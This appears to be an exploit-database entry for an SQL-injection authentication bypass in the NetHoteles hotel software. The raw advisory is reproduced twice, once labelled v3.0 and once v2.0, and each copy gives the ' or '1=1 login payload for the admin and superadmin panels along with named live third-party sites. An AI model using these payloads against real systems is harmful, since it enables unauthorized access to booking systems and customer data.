vendor: NetHoteles v2.0
by: Dns-Team
CVSS: 8,8 (HIGH)
Authentication Bypass
CWE: 287
Product Name: NetHoteles v2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

NetHoteles v2.0 (Auth Bypass) Remote Sql Injection

NetHoteles v2.0 is vulnerable to authentication bypass because the login form does not properly validate input: the username and password fields are open to SQL injection. An attacker who supplies malicious input in those fields bypasses authentication and gains access to the application, and can then use it for malicious activities such as data exfiltration or privilege escalation.

Mitigation:

Input validation should be implemented to ensure that only valid input is accepted. Additionally, authentication should be enforced for all users and access to sensitive data should be restricted.

Exploit-DB raw data:

#############################################################################
#                                                                           #
#           NetHoteles v3.0 (Auth Bypass) Remote Sql Injection             #
#                                                                           #
#############################################################################

#############################################################################

[~]    -=[Dns-Team Marocain Hackers]=-

[~] Author: Dns-Team

[~] Contact: Q2[at]HoTmail[dot]Fr

[~] Site: www.Scam4u.com + www.Dns-Team.com

[~] Greetz: M4n1x + Sa4d + HSMX + Stack + PR0H4CK3RZ  + N@bilX


#############################################################################

---+-- Start --+---

[~] Expl0!T -1- For SuperAdmin  :

http://site.ir/superadmin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://internationalhotelbooking.com/demo/superadmin/

#############################################################################

[~] Expl0!T -2- For Admin :

http://site.ir/admin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://internationalhotelbooking.com/demo/admin/
----------------------------------------------

---+-- End --+---

--+--> :( 4nT! Ch4T + 4nT! Girls :)<--+--
+--------:) Spam-=-Money | Hacker-+-Sport (:--------+

#############################################################################


#############################################################################
#                                                                           #
#           NetHoteles v2.0 (Auth Bypass) Remote Sql Injection             #
#                                                                           #
#############################################################################

#############################################################################

[~]    -=[Dns-Team Marocain Hackers]=-

[~] Author: Dns-Team

[~] Contact: Q2[at]HoTmail[dot]Fr

[~] Site: www.Scam4u.com + www.Dns-Team.com

[~] Greetz: M4n1x + Sa4d + HSMX + Stack + PR0H4CK3RZ  + N@bilX


#############################################################################

---+-- Start --+---

[~] Expl0!T -1- For SuperAdmin  :

http://site.ir/superadmin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://www.sierracazorla.com/nethoteles/superadmin/

#############################################################################

[~] Expl0!T -2- For Admin :

http://site.ir/admin

username:  ' or '1=1
Password:  ' or '1=1

[~] L1vè Dém0 :

http://www.sierracazorla.com/nethoteles/admin/
----------------------------------------------

---+-- End --+---

--+--> :( 4nT! Ch4T + 4nT! Girls :)<--+--
+--------:) Spam-=-Money | Hacker-+-Sport (:--------+

#############################################################################

# milw0rm.com [2009-04-16]